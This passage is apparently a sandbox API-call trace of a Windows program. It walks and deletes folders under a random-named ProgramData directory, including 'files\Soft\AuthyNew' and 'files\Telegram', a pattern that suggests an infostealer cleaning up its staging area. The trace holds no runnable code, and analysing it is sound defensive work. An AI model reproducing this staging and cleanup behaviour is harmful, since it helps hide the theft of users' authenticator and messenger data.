lpString1="\\Soft\\AuthyNew") returned="\\Soft\\AuthyNew" [0116.497] lstrcmpW (lpString1="AuthyNew", lpString2=".") returned 1 [0116.497] lstrcmpW (lpString1="AuthyNew", lpString2="..") returned 1 [0116.497] lstrcpyW (in: lpString1=0x19e198, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" [0116.497] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\*.*" [0116.497] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\*.*", lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351cd301, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351cd301, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351cd301, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743320 [0116.497] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" [0116.497] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\" [0116.497] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\." [0116.497] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Soft\\AuthyNew" | out: lpString1="\\Soft\\AuthyNew") returned="\\Soft\\AuthyNew" [0116.497] lstrcatW (in: lpString1="\\Soft\\AuthyNew", lpString2="\\" | out: lpString1="\\Soft\\AuthyNew\\") returned="\\Soft\\AuthyNew\\" [0116.497] lstrcatW (in: lpString1="\\Soft\\AuthyNew\\", lpString2="." | out: lpString1="\\Soft\\AuthyNew\\.") returned="\\Soft\\AuthyNew\\." [0116.497] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.497] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351cd301, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351cd301, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351cd301, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.497] lstrcpyW (in: lpString1=0x19dd88, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" [0116.497] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\" [0116.497] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew\\.." [0116.497] lstrcpyW (in: lpString1=0x19df90, lpString2="\\Soft\\AuthyNew" | out: lpString1="\\Soft\\AuthyNew") returned="\\Soft\\AuthyNew" [0116.497] lstrcatW (in: lpString1="\\Soft\\AuthyNew", lpString2="\\" | out: lpString1="\\Soft\\AuthyNew\\") returned="\\Soft\\AuthyNew\\" [0116.497] lstrcatW (in: lpString1="\\Soft\\AuthyNew\\", lpString2=".." | out: lpString1="\\Soft\\AuthyNew\\..") returned="\\Soft\\AuthyNew\\.." [0116.497] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.497] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.497] FindNextFileW (in: hFindFile=0x743320, lpFindFileData=0x19db38 | out: lpFindFileData=0x19db38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351cd301, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351cd301, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351cd301, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.497] FindClose (in: hFindFile=0x743320 | out: hFindFile=0x743320) returned 1 [0116.498] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0116.498] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3d) returned 0x29a2cd8 [0116.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew", cchWideChar=61, lpMultiByteStr=0x29a2cd8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew", lpUsedDefaultChar=0x0) returned 61 [0116.498] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2d68 [0116.498] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0116.498] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.498] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6868 [0116.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19ed40, cbMultiByte=4, lpWideCharStr=0x29a6868, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.498] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6868 | out: hHeap=0x29a0000) returned 1 [0116.498] PathMatchSpecW (pszFile="AuthyNew", pszSpec="*.*") returned 1 [0116.498] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a36d0 [0116.498] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703f8 [0116.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0116.498] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3d) returned 0x29a2ae0 [0116.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew", cchWideChar=61, lpMultiByteStr=0x29a2ae0, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew", lpUsedDefaultChar=0x0) returned 61 [0116.498] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a98 [0116.498] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2ae0 | out: hHeap=0x29a0000) returned 1 [0116.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Soft\\AuthyNew", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0116.498] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xf) returned 0x29aaae0 [0116.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Soft\\AuthyNew", cchWideChar=15, lpMultiByteStr=0x29aaae0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Soft\\AuthyNew", lpUsedDefaultChar=0x0) returned 15 [0116.498] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29aaae0 | out: hHeap=0x29a0000) returned 1 [0116.498] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft\\authynew"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.498] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2a98 | out: hHeap=0x29a0000) returned 1 [0116.498] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703f8 | out: hHeap=0x29a0000) returned 1 [0116.499] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.499] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft\\AuthyNew" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft\\authynew")) returned 0 [0116.499] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2d68 | out: hHeap=0x29a0000) returned 1 [0116.499] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x351cd301, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x351cd301, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x351cd301, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AuthyNew", cAlternateFileName="")) returned 0 [0116.499] FindClose (in: hFindFile=0x743420 | out: hFindFile=0x743420) returned 1 [0116.499] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0116.499] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x34) returned 0x38ea918 [0116.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", cchWideChar=52, lpMultiByteStr=0x38ea918, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", lpUsedDefaultChar=0x0) returned 52 [0116.499] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a27c8 [0116.499] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea918 | out: hHeap=0x29a0000) returned 1 [0116.499] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.499] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6948 [0116.499] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a6948, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.499] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6948 | out: hHeap=0x29a0000) returned 1 [0116.499] PathMatchSpecW (pszFile="Soft", pszSpec="*.*") returned 1 [0116.499] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", cchWideChar=52, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 52 [0116.499] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x34) returned 0x38ea758 [0116.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", cchWideChar=52, lpMultiByteStr=0x38ea758, cbMultiByte=52, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft", lpUsedDefaultChar=0x0) returned 52 [0116.499] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2cd8 [0116.499] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea758 | out: hHeap=0x29a0000) returned 1 [0116.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Soft", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0116.500] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x6) returned 0x29a6808 [0116.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\Soft", cchWideChar=6, lpMultiByteStr=0x29a6808, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\Soft", lpUsedDefaultChar=0x0) returned 6 [0116.500] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6808 | out: hHeap=0x29a0000) returned 1 [0116.500] CreateFileA (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0116.500] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a2cd8 | out: hHeap=0x29a0000) returned 1 [0116.500] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.500] DeleteFileW (lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Soft" (normalized: "c:\\programdata\\ep87sx37hd9cg2zmd4jqml7k1\\files\\soft")) returned 0 [0116.500] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a27c8 | out: hHeap=0x29a0000) returned 1 [0116.500] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19ee38 | out: lpFindFileData=0x19ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3565ce57, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3565ce57, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3565ce57, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Telegram", cAlternateFileName="")) returned 1 [0116.500] lstrcpyW (in: lpString1=0x19f088, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files" [0116.500] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\" [0116.500] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\", lpString2="Telegram" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" [0116.500] lstrcpyW (in: lpString1=0x19f290, lpString2="" | out: lpString1="") returned="" [0116.500] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0116.500] lstrcatW (in: lpString1="\\", lpString2="Telegram" | out: lpString1="\\Telegram") returned="\\Telegram" [0116.500] lstrcmpW (lpString1="Telegram", lpString2=".") returned 1 [0116.500] lstrcmpW (lpString1="Telegram", lpString2="..") returned 1 [0116.500] lstrcpyW (in: lpString1=0x19eb18, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" [0116.501] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram", lpString2="\\*.*" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\*.*") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\*.*" [0116.501] FindFirstFileW (in: lpFileName="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\*.*", lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3565ce57, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3565ce57, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3565ce57, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743420 [0116.501] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" [0116.501] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\" [0116.501] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\", lpString2="." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\.") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\." [0116.501] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Telegram" | out: lpString1="\\Telegram") returned="\\Telegram" [0116.501] lstrcatW (in: lpString1="\\Telegram", lpString2="\\" | out: lpString1="\\Telegram\\") returned="\\Telegram\\" [0116.501] lstrcatW (in: lpString1="\\Telegram\\", lpString2="." | out: lpString1="\\Telegram\\.") returned="\\Telegram\\." [0116.501] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0116.501] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3565ce57, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3565ce57, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3565ce57, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.501] lstrcpyW (in: lpString1=0x19e708, lpString2="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram" [0116.501] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram", lpString2="\\" | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\" [0116.501] lstrcatW (in: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\", lpString2=".." | out: lpString1="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\..") returned="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram\\.." [0116.501] lstrcpyW (in: lpString1=0x19e910, lpString2="\\Telegram" | out: lpString1="\\Telegram") returned="\\Telegram" [0116.501] lstrcatW (in: lpString1="\\Telegram", lpString2="\\" | out: lpString1="\\Telegram\\") returned="\\Telegram\\" [0116.501] lstrcatW (in: lpString1="\\Telegram\\", lpString2=".." | out: lpString1="\\Telegram\\..") returned="\\Telegram\\.." [0116.501] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0116.501] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0116.501] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19e4b8 | out: lpFindFileData=0x19e4b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3565ce57, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x3565ce57, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3565ce57, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0116.502] FindClose (in: hFindFile=0x743420 | out: hFindFile=0x743420) returned 1 [0116.502] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0116.502] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x38) returned 0x38ea5d8 [0116.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram", cchWideChar=56, lpMultiByteStr=0x38ea5d8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram", lpUsedDefaultChar=0x0) returned 56 [0116.502] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a2a50 [0116.502] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x38ea5d8 | out: hHeap=0x29a0000) returned 1 [0116.502] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a36d0 | out: hHeap=0x29a0000) returned 1 [0116.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0116.502] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a6848 [0116.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19f6c0, cbMultiByte=4, lpWideCharStr=0x29a6848, cchWideChar=4 | out: lpWideCharStr="*.*") returned 4 [0116.502] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6848 | out: hHeap=0x29a0000) returned 1 [0116.502] PathMatchSpecW (pszFile="Telegram", pszSpec="*.*") returned 1 [0116.502] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a36d0 [0116.502] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0116.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0116.502] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x38) returned 0x38ea418 [0116.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\ProgramData\\EP87SX37HD9CG2ZMD4JQML7K1\\files\\Telegram", cchWideChar=56, lpMultiByteStr=0x38ea418, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 